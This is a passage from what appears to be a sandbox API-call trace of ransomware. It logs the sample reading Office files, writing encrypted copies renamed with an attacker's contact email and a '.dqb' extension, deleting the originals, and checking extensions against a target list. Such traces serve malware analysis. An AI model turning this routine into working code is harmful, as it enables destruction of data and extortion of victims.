dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0038.416] GetLastError () returned 0x0 [0038.416] ReadFile (in: hFile=0x1a4, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x11644, lpOverlapped=0x0) returned 1 [0038.418] WriteFile (in: hFile=0x1bc, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x11650, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x11650, lpOverlapped=0x0) returned 1 [0038.420] ReadFile (in: hFile=0x1a4, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0038.420] WriteFile (in: hFile=0x1bc, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xe2, lpOverlapped=0x0) returned 1 [0038.420] SetEndOfFile (hFile=0x1bc) returned 1 [0038.420] CloseHandle (hObject=0x1bc) returned 1 [0038.421] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0038.421] SetEndOfFile (hFile=0x1a4) returned 1 [0038.422] CloseHandle (hObject=0x1a4) returned 1 [0038.422] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0038.423] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\oct.chm")) returned 1 [0038.423] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM") returned 100 [0038.423] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM") returned 100 [0038.423] lstrlenW (lpString=".doc") returned 4 [0038.423] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0038.423] lstrlenW (lpString=".docx") returned 5 [0038.423] lstrcmpiW (lpString1=".docx", lpString2="T.CHM") returned -1 [0038.423] lstrlenW (lpString=".pdf") returned 4 [0038.423] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0038.423] lstrlenW (lpString=".xls") returned 4 [0038.423] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0038.423] lstrlenW (lpString=".xlsx") returned 5 [0038.423] lstrcmpiW (lpString1=".xlsx", lpString2="T.CHM") returned -1 [0038.423] lstrlenW (lpString=".ppt") returned 4 [0038.423] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0038.423] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM") returned 100 [0038.423] lstrlenW (lpString=".zip") returned 4 [0038.423] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0038.423] lstrlenW (lpString=".rar") returned 4 [0038.423] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0038.423] lstrlenW (lpString=".bz2") returned 4 [0038.423] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0038.423] lstrlenW (lpString=".7z") returned 3 [0038.423] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0038.423] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM") returned 100 [0038.423] lstrlenW (lpString=".dbf") returned 4 [0038.423] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0038.423] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM") returned 100 [0038.424] lstrlenW (lpString=".1cd") returned 4 [0038.424] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0038.424] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM") returned 100 [0038.424] lstrlenW (lpString=".jpg") returned 4 [0038.424] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0038.424] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM") returned 100 [0038.424] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM") returned 100 [0038.424] lstrlenW (lpString=".doc") returned 4 [0038.424] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0038.424] lstrlenW (lpString=".docx") returned 5 [0038.424] lstrcmpiW (lpString1=".docx", lpString2="T.CHM") returned -1 [0038.424] lstrlenW (lpString=".pdf") returned 4 [0038.424] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0038.424] lstrlenW (lpString=".xls") returned 4 [0038.424] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0038.424] lstrlenW (lpString=".xlsx") returned 5 [0038.424] lstrcmpiW (lpString1=".xlsx", lpString2="T.CHM") returned -1 [0038.424] lstrlenW (lpString=".ppt") returned 4 [0038.424] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0038.424] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM") returned 100 [0038.424] lstrlenW (lpString=".zip") returned 4 [0038.424] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0038.424] lstrlenW (lpString=".rar") returned 4 [0038.424] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0038.424] lstrlenW (lpString=".bz2") returned 4 [0038.424] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0038.424] lstrlenW (lpString=".7z") returned 3 [0038.424] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0038.424] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM") returned 100 [0038.424] lstrlenW (lpString=".dbf") returned 4 [0038.424] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0038.424] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM") returned 100 [0038.424] lstrlenW (lpString=".1cd") returned 4 [0038.424] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0038.425] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM") returned 100 [0038.425] lstrlenW (lpString=".jpg") returned 4 [0038.425] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0038.425] lstrcmpiW (lpString1=".XML", lpString2=".dqb") returned 1 [0038.425] lstrlenW (lpString="OfficeMUI.XML") returned 13 [0038.425] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0038.426] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x227ff1c | out: lpFileSize=0x227ff1c*=5557) returned 1 [0038.426] CloseHandle (hObject=0x1a4) returned 1 [0038.426] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemui.xml")) returned 0x20 [0038.426] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemui.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0038.426] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0038.426] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0038.426] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0038.426] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemui.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0038.426] GetLastError () returned 0x0 [0038.426] ReadFile (in: hFile=0x1a4, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x15b5, lpOverlapped=0x0) returned 1 [0038.428] WriteFile (in: hFile=0x1bc, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x15c0, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x15c0, lpOverlapped=0x0) returned 1 [0038.429] ReadFile (in: hFile=0x1a4, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0038.429] WriteFile (in: hFile=0x1bc, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xee, lpOverlapped=0x0) returned 1 [0038.429] SetEndOfFile (hFile=0x1bc) returned 1 [0038.429] CloseHandle (hObject=0x1bc) returned 1 [0038.430] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0038.430] SetEndOfFile (hFile=0x1a4) returned 1 [0038.432] CloseHandle (hObject=0x1a4) returned 1 [0038.432] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0038.432] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemui.xml")) returned 1 [0038.432] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML") returned 106 [0038.432] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML") returned 106 [0038.432] lstrlenW (lpString=".doc") returned 4 [0038.432] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0038.432] lstrlenW (lpString=".docx") returned 5 [0038.432] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0038.432] lstrlenW (lpString=".pdf") returned 4 [0038.432] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0038.432] lstrlenW (lpString=".xls") returned 4 [0038.432] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0038.432] lstrlenW (lpString=".xlsx") returned 5 [0038.432] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0038.432] lstrlenW (lpString=".ppt") returned 4 [0038.432] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0038.432] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML") returned 106 [0038.432] lstrlenW (lpString=".zip") returned 4 [0038.432] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0038.433] lstrlenW (lpString=".rar") returned 4 [0038.433] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0038.433] lstrlenW (lpString=".bz2") returned 4 [0038.433] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0038.433] lstrlenW (lpString=".7z") returned 3 [0038.433] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0038.433] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML") returned 106 [0038.433] lstrlenW (lpString=".dbf") returned 4 [0038.433] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0038.433] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML") returned 106 [0038.433] lstrlenW (lpString=".1cd") returned 4 [0038.433] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0038.433] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML") returned 106 [0038.433] lstrlenW (lpString=".jpg") returned 4 [0038.433] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0038.433] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML") returned 106 [0038.433] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML") returned 106 [0038.433] lstrlenW (lpString=".doc") returned 4 [0038.433] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0038.433] lstrlenW (lpString=".docx") returned 5 [0038.433] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0038.433] lstrlenW (lpString=".pdf") returned 4 [0038.433] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0038.433] lstrlenW (lpString=".xls") returned 4 [0038.433] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0038.433] lstrlenW (lpString=".xlsx") returned 5 [0038.433] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0038.433] lstrlenW (lpString=".ppt") returned 4 [0038.433] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0038.433] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML") returned 106 [0038.433] lstrlenW (lpString=".zip") returned 4 [0038.433] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0038.433] lstrlenW (lpString=".rar") returned 4 [0038.433] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0038.434] lstrlenW (lpString=".bz2") returned 4 [0038.434] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0038.434] lstrlenW (lpString=".7z") returned 3 [0038.434] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0038.434] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML") returned 106 [0038.434] lstrlenW (lpString=".dbf") returned 4 [0038.434] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0038.434] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML") returned 106 [0038.434] lstrlenW (lpString=".1cd") returned 4 [0038.434] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0038.434] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML") returned 106 [0038.434] lstrlenW (lpString=".jpg") returned 4 [0038.434] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0038.434] lstrcmpiW (lpString1=".XML", lpString2=".dqb") returned 1 [0038.434] lstrlenW (lpString="OfficeMUISet.XML") returned 16 [0038.434] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemuiset.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0038.434] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x227ff1c | out: lpFileSize=0x227ff1c*=819) returned 1 [0038.434] CloseHandle (hObject=0x1a4) returned 1 [0038.434] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemuiset.xml")) returned 0x20 [0038.434] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemuiset.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0038.434] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemuiset.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0038.435] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0038.435] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0038.435] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemuiset.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0038.435] GetLastError () returned 0x0 [0038.435] ReadFile (in: hFile=0x1a4, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x333, lpOverlapped=0x0) returned 1 [0038.436] WriteFile (in: hFile=0x1bc, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x340, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x340, lpOverlapped=0x0) returned 1 [0038.437] ReadFile (in: hFile=0x1a4, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0038.437] WriteFile (in: hFile=0x1bc, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xf4, lpOverlapped=0x0) returned 1 [0038.437] SetEndOfFile (hFile=0x1bc) returned 1 [0038.437] CloseHandle (hObject=0x1bc) returned 1 [0038.438] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0038.438] SetEndOfFile (hFile=0x1a4) returned 1 [0038.439] CloseHandle (hObject=0x1a4) returned 1 [0038.439] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0038.439] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemuiset.xml")) returned 1 [0038.439] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML") returned 109 [0038.439] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML") returned 109 [0038.439] lstrlenW (lpString=".doc") returned 4 [0038.439] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0038.439] lstrlenW (lpString=".docx") returned 5 [0038.439] lstrcmpiW (lpString1=".docx", lpString2="t.XML") returned -1 [0038.439] lstrlenW (lpString=".pdf") returned 4 [0038.439] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0038.439] lstrlenW (lpString=".xls") returned 4 [0038.439] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0038.439] lstrlenW (lpString=".xlsx") returned 5 [0038.439] lstrcmpiW (lpString1=".xlsx", lpString2="t.XML") returned -1 [0038.439] lstrlenW (lpString=".ppt") returned 4 [0038.439] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0038.439] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML") returned 109 [0038.439] lstrlenW (lpString=".zip") returned 4 [0038.440] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0038.440] lstrlenW (lpString=".rar") returned 4 [0038.440] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0038.440] lstrlenW (lpString=".bz2") returned 4 [0038.440] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0038.440] lstrlenW (lpString=".7z") returned 3 [0038.440] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0038.440] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML") returned 109 [0038.440] lstrlenW (lpString=".dbf") returned 4 [0038.440] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0038.440] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML") returned 109 [0038.440] lstrlenW (lpString=".1cd") returned 4 [0038.440] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0038.440] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML") returned 109 [0038.440] lstrlenW (lpString=".jpg") returned 4 [0038.440] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0038.440] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML") returned 109 [0038.440] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML") returned 109 [0038.440] lstrlenW (lpString=".doc") returned 4 [0038.440] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0038.440] lstrlenW (lpString=".docx") returned 5 [0038.440] lstrcmpiW (lpString1=".docx", lpString2="t.XML") returned -1 [0038.440] lstrlenW (lpString=".pdf") returned 4 [0038.440] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0038.440] lstrlenW (lpString=".xls") returned 4 [0038.440] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0038.440] lstrlenW (lpString=".xlsx") returned 5 [0038.440] lstrcmpiW (lpString1=".xlsx", lpString2="t.XML") returned -1 [0038.440] lstrlenW (lpString=".ppt") returned 4 [0038.440] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0038.440] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML") returned 109 [0038.440] lstrlenW (lpString=".zip") returned 4 [0038.440] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0038.440] lstrlenW (lpString=".rar") returned 4 [0038.440] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0038.441] lstrlenW (lpString=".bz2") returned 4 [0038.441] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0038.441] lstrlenW (lpString=".7z") returned 3 [0038.441] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0038.441] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML") returned 109 [0038.441] lstrlenW (lpString=".dbf") returned 4 [0038.441] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0038.441] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML") returned 109 [0038.441] lstrlenW (lpString=".1cd") returned 4 [0038.441] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0038.441] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML") returned 109 [0038.441] lstrlenW (lpString=".jpg") returned 4 [0038.441] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0038.441] lstrcmpiW (lpString1=".CHM", lpString2=".dqb") returned -1 [0038.441] lstrlenW (lpString="PSCONFIG.CHM") returned 12 [0038.441] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\psconfig.chm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0038.793] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x227ff1c | out: lpFileSize=0x227ff1c*=37689) returned 1 [0038.793] CloseHandle (hObject=0x17c) returned 1 [0038.793] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\psconfig.chm")) returned 0x20 [0038.793] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup 